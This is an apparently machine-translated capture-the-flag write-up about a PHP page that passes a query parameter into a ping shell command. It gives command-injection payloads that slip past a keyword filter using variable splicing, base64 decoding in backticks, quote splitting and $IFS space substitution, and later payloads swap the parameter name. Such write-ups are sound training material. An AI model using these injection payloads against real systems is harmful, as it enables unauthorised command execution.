Source code:
<?php
highlight_file("index.php");
if(preg_match("/flag/i", $_GET["ip"]))
{
die("no flag");
}
system("ping -c 3 $_GET[ip]");
?>
The obvious command execution:
From the above, we can see that flag.php is in the current directory, so just cat ./flag directly?
But people filter the flag keyword. The way to bypass it is very simple (actually, I just encountered it not long ago...). There are many ways to bypass it; the
idea is also very simple, as long as it matches the keyword.
Bypass
1. Use variables to bypass:
By assigning values to variables and splicing, you can bypass:
payload:
?ip=1;a=fl;b=ag;cat $a$b.php
View source code:
2. Encode by base64
The commands we need to execute are passed into base64 encoding, and then decoded and executed
?id=1;cat `echo 'Li9mbGFnLnBocAo=' | base64 -d`
Here to talk about it: the backtick `plays a role of command substitution in the Linux command line. Command substitution means that the shell can insert the standard output of a command anywhere in a command line, that is, complete the execution of the quoted command and replace the result. That is to say, the output result of the command decoded by base64 in `will be returned to the command. This way the restriction can be bypassed. (Say, here is not only the backtick `, $() can also play a command substitution effect in the shell.) It
also indirectly executes cat ./flag.php
View source code:
3 bypass keywords with quotes
The main purpose is to prevent the keyword from being matched. It is easy to handle the
payload:
?id=1;cat ./fl'ag'.php
View source code:
4. Filter around spaces
If you encounter filter spaces, you can \${IFS}、<、 $IFS、\$IFS$9
wait for characters to replace them.
Of course, the bypassing posture is definitely more than the ones mentioned above, you need to know how to adapt.
flag:
flag:flag{
I_like_qwb_web